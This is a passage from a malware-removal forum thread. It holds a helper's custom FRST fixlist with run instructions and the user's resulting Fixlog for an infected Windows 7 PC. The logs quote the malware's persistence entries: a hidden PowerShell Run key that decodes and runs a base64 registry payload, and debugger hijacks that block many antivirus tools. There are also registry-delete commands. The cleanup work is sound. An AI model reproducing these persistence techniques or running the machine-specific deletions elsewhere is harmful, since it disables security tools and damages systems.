    Task: {4D36E943-5B4B-417D-866E-E3F85BD73E06} - \TuneUpUtilities_Task_BkGndMaintenance2013 -> No File <==== ATTENTION
    Task: {4E8A2AB5-82D2-4748-9188-0E52B2B4F655} - \RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380} -> No File <==== ATTENTION
    Task: {4F4C7C4A-4737-4F99-AF72-85BE3C1F13A4} - \{F0E4F20A-26C0-4803-85F3-DE100A506A22} -> No File <==== ATTENTION
    Task: {5E4FD528-665B-4BC7-92C3-FC3316142788} - \{CF0DA0CD-2FF5-454E-A86C-8C36A48353BC} -> No File <==== ATTENTION
    Task: {694BC2C8-C491-43DE-BBE5-75891AEE91CB} - \{0EC195FB-14E3-4A02-B5E5-AAFFE238361D} -> No File <==== ATTENTION
    Task: {72ACF684-33A4-45E8-ACB2-EAF73F1A890E} - \{7BF7CA1C-3C80-4A51-B3A7-61A431253F64} -> No File <==== ATTENTION
    Task: {74889F7C-185A-465F-8C1C-567D2DCC89F3} - \pimofki -> No File <==== ATTENTION
    Task: {7BD59BB0-7AB6-4C3F-86F5-EA01AB5F3279} - \fuwykpyf -> No File <==== ATTENTION
    Task: {9810F01D-F471-42A3-B856-C40FC59F9803} - \{8F1539C2-BC2A-4974-A0CC-92330EC7F6BF} -> No File <==== ATTENTION
    Task: {9CBF7DD8-1CE8-4DCB-B923-DAF4E4701D7D} - \{6DE94743-B83B-4B6B-90D4-3221A25A338C} -> No File <==== ATTENTION
    Task: {9F201C7A-576B-4D43-8D9F-A4B54293FCEF} - \{C5939251-AF8C-4222-AEE8-017F4EFC29BA} -> No File <==== ATTENTION
    Task: {AF04095F-DCCD-4778-8E44-F5EBFFD2B929} - \{F7D851AA-0D16-4E69-A250-0BBEFB60741F} -> No File <==== ATTENTION
    Task: {B392518B-C4FB-46AB-97B9-C782DF67F093} - \{F05E8383-6A0D-4EC7-8387-45219DAF74DC} -> No File <==== ATTENTION
    Task: {B4849F2D-8897-4812-B999-D27BD4E24928} - \{0124643C-E010-44C2-9F26-76F3A357FEEC} -> No File <==== ATTENTION
    Task: {C04DD09C-8E8F-4EFC-BA40-76E38C017EDF} - \{83496550-34D8-473D-9C5B-22447F85749B} -> No File <==== ATTENTION
    Task: {C47C9F45-028F-489C-8034-E39D23DEF266} - System32\Tasks\{04502F1C-86D9-4EA2-9C23-9BC3171C1BDD} => pcalua.exe -a C:\Users\violeta\Downloads\qsfv236.exe -d C:\Users\violeta\Downloads
    Task: {C92C0B60-5D18-4764-96A6-F34DE2E15136} - \AdobeFlashPlayerUpdate -> No File <==== ATTENTION
    Task: {D0EEEA40-7CEF-4D6D-A553-DE1D49CBB4B8} - \RealDownloaderDownloaderScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
    Task: {D97EE862-AE54-469B-BEE3-B49B10A1B715} - \{FCDC0ED4-0446-4695-8787-4841D69B92BC} -> No File <==== ATTENTION
    Task: {DE7F472F-7147-4F3C-9A59-01F3BCF2BC5A} - System32\Tasks\Norton Security Scan for violeta => C:\PROGRA~1\NORTON~2\Engine\403~1.27\Nss.exe
    Task: {E7ACA675-7025-4907-B741-CDA24CF6A000} - \{56AC13DC-CA7D-4BD2-B12C-8D196A5BA630} -> No File <==== ATTENTION
    Task: {F170349C-A3EE-4B1E-B817-A0EB7254A9AA} - \RealPlayerRealUpgradeLogonTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
    Task: {FE5C0531-D94E-4827-9879-2EF8A4CF5047} - System32\Tasks\UnHackMe Task Scheduler => C:\Program Files\UnHackMe\hackmon.exe [2015-10-07] (Greatis Software)
    Task: {FF8DA4BE-015F-43F0-92CE-F0CD9BF820F0} - \{74CF8BF1-6DC8-411D-BEAF-22DAA4FEDFAF} -> No File <==== ATTENTION
    Task: C:\Windows\Tasks\Norton Security Scan for violeta.job => C:\PROGRA~1\NORTON~2\Engine\403~1.27\Nss.exe
    Shortcut: C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Покретач Chrome апликација.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (No File) <===== Cyrillic
    Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Покретач Chrome апликација.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (No File) <===== Cyrillic
    Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GarrysMod\Start Garrysmod.lnk -> C:\Program Files\GarrysMod\Start.bat (No File)
    AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [119]
    AlternateDataStreams: C:\ProgramData\TEMP:AD022376 [131]
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [{57E0064B-6CDF-4014-A8FF-F401291F5488}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\NYQUMMEV').KgJaKWdyhxnot)));
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\CurrentVersion\Windows: [Load] C:\Windows\system32\Microsoft.com <===== ATTENTION
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: E - E:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: H - H:\setup.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {77b5a5be-29d4-11e1-ac3d-806e6f6e6963} - D:\setup\rsrc\Autorun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c0d6b2af-2ab0-11e1-8970-6c626daeeb0d} - E:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c5841f0c-20e0-11e6-8237-6c626daeeb0d} - I:\INSTALL_ADB_RNDIS.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {cd9f060b-2c6a-11e1-a88a-6c626daeeb0d} - E:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0150-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0177-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fa2-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fad-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
    HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
    HKU\S-1-5-18\...\Policies\Explorer: [HideSCAHealth] 1
    IFEO\AvastSvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\AvastUI.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avcenter.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avconfig.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgcsrvx.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgidsagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgrsx.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avguard.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgwdsvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avp.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avscan.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\bdagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\ccuac.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\ComboFix.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\coreFrameworkHost.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\coreServiceShell.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\egui.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\hijackthis.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\instup.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\keyscrambler.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\mbam.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\mbamgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\mbampt.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\mbamscheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\mbamservice.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\MpCmdRun.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\MSASCui.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\MsMpEng.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\msseces.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\rstrui.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\spybotsd.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\SSScheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\TuneUpUtilitiesApp32.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\TuneUpUtilitiesService32.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\uiSeAgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\uiWatchDog.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\wireshark.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\zlclient.exe: [Debugger] C:\Windows\system32\Microsoft.com
    ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
    ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
    ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
    Startup: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registration RAYMAN [2015-03-20] ()
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [147456 2008-12-12] (Apple Inc.)
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3McXDvdSN6JAXeQNqF9tomnI4v_-Q-v4mvx2kMn7Bh-Xf-EJYEejn7YWcl-PlhbuddCMlP0mwyMzARSqo7-Wmu3hY49Niunccg3DmrDXz5ysmP3WX7Aete0Eac57BLcvq82zb4dfcwWjZDbkUtDIRutjgO4XjIKICjIB-c42AaU,&q={searchTerms}
    URLSearchHook: [S-1-5-21-3268508096-794200350-1188608446-1000] ATTENTION => Default URLSearchHook is missing
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext => not found
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Users\violeta\AppData\Roaming\okitspace\Firefox => not found
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha842\ff => not found
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta322\ff => not found
    FF Plugin: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll [No File]
    FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    FF Plugin: @real.com/nppl3260;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll [No File]
    FF Plugin: @real.com/nprpplugin;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll [No File]
    FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    CHR StartupUrls: Profile 1 -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651","hxxps://www.google.rs/"
    CHR DefaultSearchURL: Profile 1 -> hxxp://www.sweet-page.com/web/?type=ds&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651&q={searchTerms}
    CHR DefaultSearchKeyword: Profile 1 -> sweet-page
    CHR HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhnddlaigdpagceekbpkajlgbnjbabig] - C:\Users\violeta\AppData\Local\CRE\bhnddlaigdpagceekbpkajlgbnjbabig.crx <not found>
    U0 Partizan; C:\Windows\System32\drivers\Partizan.sys [40304 2016-03-12] (Greatis Software)
    U3 am2liese; C:\Windows\system32\Drivers\am2liese.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
    C:\Windows\system32\Drivers\am2liese.sys
    C:\ProgramData\hash.dat
    C:\ProgramData\msdsrnwj.exe
    c:\users\violeta\desktop\unhackme 7.80 build 480 + crack [4realtorrentz].zip
    c:\users\violeta\desktop\sve sa desktopa\marijne stvari\rust\rust 14.03 cracked [derpteam].zip
    c:\users\violeta\documents\spore\crack\rld-spor.exe
    c:\users\violeta\music\violeta za budjenje\keygen.exe
    C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
    C:\Users\violeta\AppData\LocalLow\uTorrent
    C:\Users\violeta\AppData\Roaming\uTorrent
    Zip: C:\Users\violeta\spopoi.exe
    2016-10-16 08:56 - 2016-03-12 13:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UnHackMe
    2016-10-16 08:56 - 2016-03-12 13:53 - 00000000 ____D C:\Program Files\UnHackMe
    Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^<username>^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk" /f
    Reg: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\uTorrent" /f
    EmptyTemp:
    end
  • Double-click FRST to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
  • Click the Fix button just once, and wait.
  • If you receive a message that a reboot is required, please make sure you allow it to restart normally.
  • The tool will complete its run after the restart.
  • When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please post the Fixlog.txt log in your reply.

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-18-2016, 11:31 PM   #13
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



yes i was able to turn on system restore,i have decided to keep bsplayer since it was used and still is for media files.It was there on purpoise.
Now the log:
Fix result of Farbar Recovery Scan Tool (x86) Version: 16-10-2016
Ran by violeta (19-10-2016 08:00:42) Run:1
Running from C:\Users\violeta\Desktop
Loaded Profiles: violeta (Available Profiles: violeta)
Boot Mode: Normal

==============================================

fixlist content:
*****************
start
createrestorepoint:
TuneUp Utilities 2013 (Version: 13.0.3000.138 - TuneUp Software) Hidden
TuneUp Utilities Language Pack (en-US) (Version: 13.0.3000.138 - TuneUp Software) Hidden
Task: {01835097-7B05-4094-B39B-A6F6BF09B715} - \AdobeFlashPlayerUpdate 2 -> No File <==== ATTENTION
Task: {05117A57-15BB-4310-AB94-ABEB78135006} - \{CFFDB85C-56BE-4D73-B744-97DB7D610B8E} -> No File <==== ATTENTION
Task: {0906990C-C047-4C7D-8D22-5255F1024FB3} - \{1E9494FA-6CA3-400B-B661-31837511C7EE} -> No File <==== ATTENTION
Task: {1C7306D1-9834-4D43-A2C5-FEFAE0216B5D} - \{3E27A315-206F-40D5-88C8-C29D09D3BAEB} -> No File <==== ATTENTION
Task: {258FDF9B-E6BF-4C1D-85FE-93C16438F4BE} - \RealPlayerRealUpgradeScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
Task: {334E8B80-9763-434E-8437-770A5DC4A520} - \20sve2tm -> No File <==== ATTENTION
Task: {39B9DF0B-CC67-48F1-A4C1-2BADF10A3AC3} - \{33C192B0-0851-4C18-BB29-6CDD784756BE} -> No File <==== ATTENTION
Task: {4D36E943-5B4B-417D-866E-E3F85BD73E06} - \TuneUpUtilities_Task_BkGndMaintenance2013 -> No File <==== ATTENTION
Task: {4E8A2AB5-82D2-4748-9188-0E52B2B4F655} - \RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380} -> No File <==== ATTENTION
Task: {4F4C7C4A-4737-4F99-AF72-85BE3C1F13A4} - \{F0E4F20A-26C0-4803-85F3-DE100A506A22} -> No File <==== ATTENTION
Task: {5E4FD528-665B-4BC7-92C3-FC3316142788} - \{CF0DA0CD-2FF5-454E-A86C-8C36A48353BC} -> No File <==== ATTENTION
Task: {694BC2C8-C491-43DE-BBE5-75891AEE91CB} - \{0EC195FB-14E3-4A02-B5E5-AAFFE238361D} -> No File <==== ATTENTION
Task: {72ACF684-33A4-45E8-ACB2-EAF73F1A890E} - \{7BF7CA1C-3C80-4A51-B3A7-61A431253F64} -> No File <==== ATTENTION
Task: {74889F7C-185A-465F-8C1C-567D2DCC89F3} - \pimofki -> No File <==== ATTENTION
Task: {7BD59BB0-7AB6-4C3F-86F5-EA01AB5F3279} - \fuwykpyf -> No File <==== ATTENTION
Task: {9810F01D-F471-42A3-B856-C40FC59F9803} - \{8F1539C2-BC2A-4974-A0CC-92330EC7F6BF} -> No File <==== ATTENTION
Task: {9CBF7DD8-1CE8-4DCB-B923-DAF4E4701D7D} - \{6DE94743-B83B-4B6B-90D4-3221A25A338C} -> No File <==== ATTENTION
Task: {9F201C7A-576B-4D43-8D9F-A4B54293FCEF} - \{C5939251-AF8C-4222-AEE8-017F4EFC29BA} -> No File <==== ATTENTION
Task: {AF04095F-DCCD-4778-8E44-F5EBFFD2B929} - \{F7D851AA-0D16-4E69-A250-0BBEFB60741F} -> No File <==== ATTENTION
Task: {B392518B-C4FB-46AB-97B9-C782DF67F093} - \{F05E8383-6A0D-4EC7-8387-45219DAF74DC} -> No File <==== ATTENTION
Task: {B4849F2D-8897-4812-B999-D27BD4E24928} - \{0124643C-E010-44C2-9F26-76F3A357FEEC} -> No File <==== ATTENTION
Task: {C04DD09C-8E8F-4EFC-BA40-76E38C017EDF} - \{83496550-34D8-473D-9C5B-22447F85749B} -> No File <==== ATTENTION
Task: {C47C9F45-028F-489C-8034-E39D23DEF266} - System32\Tasks\{04502F1C-86D9-4EA2-9C23-9BC3171C1BDD} => pcalua.exe -a C:\Users\violeta\Downloads\qsfv236.exe -d C:\Users\violeta\Downloads
Task: {C92C0B60-5D18-4764-96A6-F34DE2E15136} - \AdobeFlashPlayerUpdate -> No File <==== ATTENTION
Task: {D0EEEA40-7CEF-4D6D-A553-DE1D49CBB4B8} - \RealDownloaderDownloaderScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
Task: {D97EE862-AE54-469B-BEE3-B49B10A1B715} - \{FCDC0ED4-0446-4695-8787-4841D69B92BC} -> No File <==== ATTENTION
Task: {DE7F472F-7147-4F3C-9A59-01F3BCF2BC5A} - System32\Tasks\Norton Security Scan for violeta => C:\PROGRA~1\NORTON~2\Engine\403~1.27\Nss.exe
Task: {E7ACA675-7025-4907-B741-CDA24CF6A000} - \{56AC13DC-CA7D-4BD2-B12C-8D196A5BA630} -> No File <==== ATTENTION
Task: {F170349C-A3EE-4B1E-B817-A0EB7254A9AA} - \RealPlayerRealUpgradeLogonTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
Task: {FE5C0531-D94E-4827-9879-2EF8A4CF5047} - System32\Tasks\UnHackMe Task Scheduler => C:\Program Files\UnHackMe\hackmon.exe [2015-10-07] (Greatis Software)
Task: {FF8DA4BE-015F-43F0-92CE-F0CD9BF820F0} - \{74CF8BF1-6DC8-411D-BEAF-22DAA4FEDFAF} -> No File <==== ATTENTION
Task: C:\Windows\Tasks\Norton Security Scan for violeta.job => C:\PROGRA~1\NORTON~2\Engine\403~1.27\Nss.exe
Shortcut: C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Покретач Chrome апликација.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (No File) <===== Cyrillic
Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Покретач Chrome апликација.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (No File) <===== Cyrillic
Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GarrysMod\Start Garrysmod.lnk -> C:\Program Files\GarrysMod\Start.bat (No File)
AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [119]
AlternateDataStreams: C:\ProgramData\TEMP:AD022376 [131]
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [{57E0064B-6CDF-4014-A8FF-F401291F5488}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\NYQUMMEV').KgJaKWdyhxnot)));
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\CurrentVersion\Windows: [Load] C:\Windows\system32\Microsoft.com <===== ATTENTION
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: E - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: H - H:\setup.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {77b5a5be-29d4-11e1-ac3d-806e6f6e6963} - D:\setup\rsrc\Autorun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c0d6b2af-2ab0-11e1-8970-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c5841f0c-20e0-11e6-8237-6c626daeeb0d} - I:\INSTALL_ADB_RNDIS.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {cd9f060b-2c6a-11e1-a88a-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0150-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0177-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fa2-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fad-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
HKU\S-1-5-18\...\Policies\Explorer: [HideSCAHealth] 1
IFEO\AvastSvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\AvastUI.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avcenter.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avconfig.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgcsrvx.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgidsagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgrsx.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avguard.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgwdsvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avp.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avscan.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\bdagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\ccuac.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\ComboFix.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\coreFrameworkHost.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\coreServiceShell.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\egui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\hijackthis.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\instup.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\keyscrambler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbam.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbampt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamscheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamservice.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MpCmdRun.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MSASCui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MsMpEng.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\msseces.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\rstrui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\spybotsd.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\SSScheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\TuneUpUtilitiesApp32.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\TuneUpUtilitiesService32.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\uiSeAgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\uiWatchDog.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\wireshark.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\zlclient.exe: [Debugger] C:\Windows\system32\Microsoft.com
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
Startup: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registration RAYMAN [2015-03-20] ()
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [147456 2008-12-12] (Apple Inc.)
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3McXDvdSN6JAXeQNqF9tomnI4v_-Q-v4mvx2kMn7Bh-Xf-EJYEejn7YWcl-PlhbuddCMlP0mwyMzARSqo7-Wmu3hY49Niunccg3DmrDXz5ysmP3WX7Aete0Eac57BLcvq82zb4dfcwWjZDbkUtDIRutjgO4XjIKICjIB-c42AaU,&q={searchTerms}
URLSearchHook: [S-1-5-21-3268508096-794200350-1188608446-1000] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
